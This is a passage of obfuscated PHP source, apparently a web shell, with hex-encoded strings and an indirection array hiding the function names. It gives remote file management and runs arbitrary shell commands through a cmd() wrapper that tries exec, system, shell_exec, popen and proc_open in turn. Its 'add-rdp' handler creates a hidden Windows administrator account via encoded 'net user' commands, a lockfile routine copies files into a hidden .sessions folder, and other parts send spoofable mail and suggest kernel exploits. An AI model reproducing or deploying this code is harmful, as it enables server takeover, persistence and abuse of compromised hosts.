"\x22\x65\x6d\x61\x69\x6c\x22\x20\x3a\x20\x22" . $e6p9d . "\x22\n"; $h2apc = $pr1vxas[3]; $v5dpy = $pr1vxas[28]; if ($h2apc($t2wqs)) { $v5dpy($t2wqs, $y6qjw); echo ''; } else { failed(); } } if (isset($_POST['create_folder']) && $_POST['create_folder']) { $q7hjp = $_POST['create_folder']; $s2f6x = $pr1vxas[12]; if (!file_exists($q7hjp)) { $z9mqa = @mkdir($q7hjp, 0755, true);} else { $z9mqa = true; } if ($z9mqa) { success(); } else { failed(); } } else if (isset($_POST['create_file']) && $_POST['create_file']) { $k4vhz = $_POST['create_file']; $t2upm = $pr1vxas[13]; $x6wnr = $t2upm($k4vhz); if ($x6wnr) { success(); } else { failed(); } } else if (isset($_POST['renameFile']) && $_POST['renameFile']) { $d9yxs = $_POST['renameFile']; $h8rfg = $pr1vxas[15]; $m5qlp = $h8rfg(unx($_GET['re']), $d9yxs); if ($m5qlp) { success(); } else { failed(); } } else if (isset($_POST['chFile']) && $_POST['chFile']) { $y4gsn = $_POST['chFile']; $v3kzm = octdec($y4gsn); $p9wfu = $pr1vxas[30](unx($_GET['ch']), $v3kzm); if ($p9wfu) { success(); } else { failed(); } } else if ($_POST['lockfile'] == true) { $flesName = $_POST['lockfile']; $TmpNames = $pr1vxas[31](); if (file_exists($TmpNames . '/.sessions/.' . $pr1vxas[33]($pr1vxas[0]() . r3mv0d($flesName) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . r3mv0d($flesName) . '-text')) { cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $pr1vxas[33]($pr1vxas[0]() . r3mv0d($flesName) . '-text-file')); cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $pr1vxas[33]($pr1vxas[0]() . r3mv0d($flesName) . '-handler')); } @mkdir($TmpNames . "/.sessions"); cmd("cp $flesName " . $TmpNames . "/.sessions/." . $pr1vxas[33]($pr1vxas[0]() . r3mv0d($flesName) . '-text-file')); cmd("chmod 444 " . $flesName); $handler = ' /dev/null 2>/dev/null &'; cmd($pr1pr1v); success(); } else { failed(); } } else if ($_POST['add-rdp'] == true) { $r7kdy = $_POST['add-rdp']; $s4nyw = $_POST['add-rdp-pass']; if (stristr(PHP_OS, "\x57\x49\x4e")) { $t9plm = cmd("\x6e\x65\x74\x20\x75\x73\x65\x72\x20" . $r7kdy . " " . $s4nyw . " /add"); if ($t9plm) { cmd("\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20" . $r7kdy . " /add"); success(); } else { failed(); } } else { failed(); } } else if ($_POST['mail-from-smtp'] == true) { $y6kvf = $_POST['mail-from-smtp']; $z5lpg = $_POST['mail-to-smtp']; $x9qbn = $_POST['mailto-subject']; $f3mwt = $_POST['message-smtp']; $a4sdn = 'From: ' . $y6kvf . "\r\n" . 'Reply-To: ' . $y6kvf . "\r\n" . 'X-Mailer: PHP/' . phpversion(); $b8nsz = mail($z5lpg, $x9qbn, $f3mwt, $a4sdn); if ($b8nsz) { success(); } else { failed(); } }} if (isset($_GET['response']) && $_GET['response'] == "success") {echo "";}else if (isset($_GET['response']) && $_GET['response'] == "failed") {echo "";} function success() {echo '';}function failed(){echo '';} function formatSize($bytes) {$types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i< (count($types) - 1); $bytes /= 1024, $i++); return (round($bytes, 2) . " " . $types[$i]);} function pr1vd444yz($n){ $y = ''; for ($i = 0; $i< strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y;}function unx($y){ $n = ''; for ($i = 0; $i< strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n;} function suggest_exploit(){ $un7xa = $GLOBALS['pr1vxas'][8](); $xplod = explode(" ", $un7xa);$xpld = explode("-", $xplod[2]); $pl = explode(".", $xpld[0]); return $pl[0] . "." . $pl[1] . "." . $pl[2];} function cmd($in, $re = false){ $out = ''; try { if ($re) $in = $in . " 2>&1"; if (function_exists("\x65\x78\x65\x63")) { @$GLOBALS['pr1vxas'][16]($in, $out); $out = @join("\n", $out); } elseif (function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")) { @$GLOBALS['pr1vxas'][17]($in); $out = ""; } elseif (function_exists("\x73\x79\x73\x74\x65\x6d")) { @$GLOBALS['pr1vxas'][18]($in); $out = ""; } elseif (function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")) { $out = $GLOBALS['pr1vxas'][19]($in); } elseif (function_exists("\x70\x6f\x70\x65\x6e") && function_exists("\x70\x63\x6c\x6f\x73\x65")) { if (is_resource($f = @$GLOBALS['pr1vxas'][20]($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); $GLOBALS['pr1vxas'][21]($f); } } elseif (function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")) { $pipes = array(); $process = @$GLOBALS['pr1vxas'][23]($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $out = @$GLOBALS['pr1vxas'][22]($pipes[1]); } } catch (Exception $e) {} return $out; } function compressToZip($sourceFile, $zipFilename){ $zip = new ZipArchive(); if ($zip->open($zipFilename, ZipArchive::CREATE) === TRUE) { $zip->addFile($sourceFile, basename($sourceFile)); $zip->close(); success(); } else { failed(); } } function r3mvx($val) { $tex = str_replace("/", "", $val); $tex1 = str_replace(":", "", $tex); $tex2 = str_replace("_", "", $tex1); $tex3 = str_replace(" ", "", $tex2); $tex4 = str_replace(".", "", $tex3); return $tex4; } function unlinkDir($dir) { $d1Xe = array($dir); $files = array(); for ($i = 0;; $i++) { if (isset($d1Xe[$i])) $dir = $d1Xe[$i]; else break; if ($opn = @opendir($dir)) { while ($rd = @readdir($opn)) { if ($rd != "\x2e" && $rd != "\x2e\x2e") { $pth = $dir . "\x2f" . $rd; if ($GLOBALS['pr1vxas'][2]($pth)) { $d1Xe[] = $pth; } else { $files[] = $pth; } } } closedir($opn); } } foreach ($files as $file) { if (!@$GLOBALS['pr1vxas'][24]($file)) { return false; } } $d1Xe = array_reverse($d1Xe); foreach ($d1Xe as $d1x2) { if (!@$GLOBALS['pr1vxas'][25]($d1x2)) { return false; } } return true; } function x6kvz($g5ydq) { $y8vnp = $g5ydq; $w2sjm = explode("\x2e", $y8vnp); return $w2sjm[0]; } function prvFx1($value) { $n4mX = $value; $ext3F = pathinfo($value, PATHINFO_EXTENSION); if (strlen($n4mX) > 30) { return substr($n4mX, 0, 30) . "\x2e\x2e\x2e"; } else { return $value; } } function xtr4cPr1v($pr1varch, $pr1vaext) { $zip = new ZipArchive(); $methOpen = chDxzZ('111,112,101,110'); $methExtract = chDxXZ('65787472616374546f'); $methClose = chDxzZ([99,108,111,115,101]); if ($zip->$methOpen($pr1varch) === TRUE) { $zip->$methExtract($pr1vaext); $zip->$methClose(); return true; } else { return false; } } function p3rms($file){$p3rxa=$GLOBALS['pr1vxas'][6]($file);if(($p3rxa&0xC000)==0xC000){$info='s';}elseif(($p3rxa&0xA000)==0xA000){$info='l';}elseif(($p3rxa&0x8000)==0x8000){$info='-';}elseif(($p3rxa&0x6000)==0x6000){$info='b';}elseif(($p3rxa&0x4000)==0x4000){$info='d';}elseif(($p3rxa&0x2000)==0x2000){$info='c';}elseif(($p3rxa&0x1000)==0x1000){$info='p';}else{$info='u';}$info.=(($p3rxa&0x0100)?'r':'-');$info.=(($p3rxa&0x0080)?'w':'-');$info.=(($p3rxa&0x0040)?(($p3rxa&0x0800)?'s':'x'):(($p3rxa&0x0800)?'S':'-'));$info.=(($p3rxa&0x0020)?'r':'-');$info.=(($p3rxa&0x0010)?'w':'-');$info.=(($p3rxa&0x0008)?(($p3rxa&0x0400)?'s':'x'):(($p3rxa&0x0400)?'S':'-'));$info.=(($p3rxa&0x0004)?'r':'-');$info.=(($p3rxa&0x0002)?'w':'-');$info.=(($p3rxa&0x0001)?(($p3rxa&0x0200)?'t':'x'):(($p3rxa&0x0200)?'T':'-'));return $info;} ?>